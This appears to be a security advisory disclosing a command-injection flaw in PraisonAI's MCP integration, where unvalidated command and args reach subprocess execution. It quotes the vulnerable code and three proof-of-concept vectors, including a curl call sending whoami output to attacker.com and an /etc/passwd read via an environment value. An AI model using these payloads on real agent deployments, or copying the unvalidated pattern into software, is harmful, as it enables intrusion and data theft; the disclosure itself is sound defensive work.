A critical Remote Code Execution (RCE) vulnerability exists in PraisonAI's MCP (Model Context Protocol) integration through the StdioServerParameters.command and args fields. The vulnerability allows arbitrary command execution through insufficient input validation when creating MCP client connections. User-controlled input is directly passed to subprocess execution without any sanitization or validation, enabling attackers to execute arbitrary system commands with the privileges of the PraisonAI process.
The vulnerability stems from the direct use of user-provided input in the MCP class constructor and related MCP client implementations. When users specify MCP server commands through various interfaces (Agent tools, direct MCP instantiation, or configuration), the input is processed through shlex.split() for parsing but then directly passed to StdioServerParameters without validation. This creates multiple attack vectors where malicious commands can be injected and executed.
The core vulnerability exists in the following flow:
- User input is accepted through MCP class instantiation or Agent tool configuration
- Input is parsed using
shlex.split()to separate command and arguments - Parsed components are directly passed to
StdioServerParameters(command=cmd, args=arguments) - The MCP client uses these parameters to spawn processes via
anyio.open_process()or similar mechanisms - Arbitrary commands execute with the application's privileges
File: src/praisonai-agents/praisonaiagents/mcp/mcp.py
Lines: 270-315
The vulnerable code pattern:
# Handle the single string format for stdio client
if isinstance(command_or_string, str) and args is None:
# Split the string into command and args using shell-like parsing
if platform.system() == 'Windows':
parts = shlex.split(command_or_string, posix=False)
parts = [part.strip('"') for part in parts]
else:
parts = shlex.split(command_or_string)
if not parts:
raise ValueError("Empty command string")
cmd = parts[0] # ← User-controlled command
arguments = parts[1:] if len(parts) > 1 else [] # ← User-controlled args
else:
cmd = command_or_string # ← Direct user input
arguments = args or [] # ← Direct user input
# Vulnerable sink point - direct use without validation
self.server_params = StdioServerParameters(
command=cmd, # ← Arbitrary command execution
args=arguments, # ← Arbitrary arguments
**kwargs
)File: src/praisonai-agents/tests/npx_mcp_wrapper_main.py
Lines: 77-82, 177-182
Multiple instances where user input flows directly to StdioServerParameters:
# Extract tools function
server_params = StdioServerParameters(
command=command, # ← User-controlled
args=args # ← User-controlled
)
# Call tool function
server_params = StdioServerParameters(
command=command, # ← User-controlled
args=args # ← User-controlled
)The vulnerability can be exploited through multiple vectors in PraisonAI. The most direct approach is through the MCP class instantiation where users can specify arbitrary commands.
Attack Vector 1: Direct MCP instantiation
from praisonaiagents import Agent, MCP
# Malicious command injection via MCP constructor
malicious_agent = Agent(
instructions="You are a helpful assistant",
llm="gpt-4o-mini",
tools=MCP("touch /tmp/pwned.txt && echo 'Command injection successful'")
)Attack Vector 2: Through Agent tool configuration
from praisonaiagents import Agent, MCP
# Command injection through args parameter
agent = Agent(
instructions="Assistant with tools",
llm="gpt-4o-mini",
tools=MCP(
command="bash",
args=["-c", "curl http://attacker.com/steal?data=$(whoami)"]
)
)Attack Vector 3: Environment variable injection
from praisonaiagents import Agent, MCP
# Injection through environment variables
agent = Agent(
instructions="Assistant",
llm="gpt-4o-mini",
tools=MCP(
"python",
args=["-c", "import os; os.system('malicious_command')"],
env={"MALICIOUS_VAR": "$(cat /etc/passwd)"}
)
)This vulnerability enables complete system compromise through:
- Arbitrary Command Execution: Attackers can execute any system command with application privileges
- Data Exfiltration: Sensitive files and environment variables can be accessed and transmitted
- Privilege Escalation: If PraisonAI runs with elevated privileges, attackers inherit those privileges
- Persistence: Attackers can install backdoors, modify system configurations, or establish reverse shells
- Lateral Movement: In containerized or networked environments, attackers can pivot to other systems
The vulnerability is particularly dangerous because:
- It can be triggered through seemingly legitimate AI assistant interactions
- No direct code access is required - only the ability to configure MCP tools
- The attack surface includes multiple entry points across the codebase
- Exploitation can be disguised as normal AI tool usage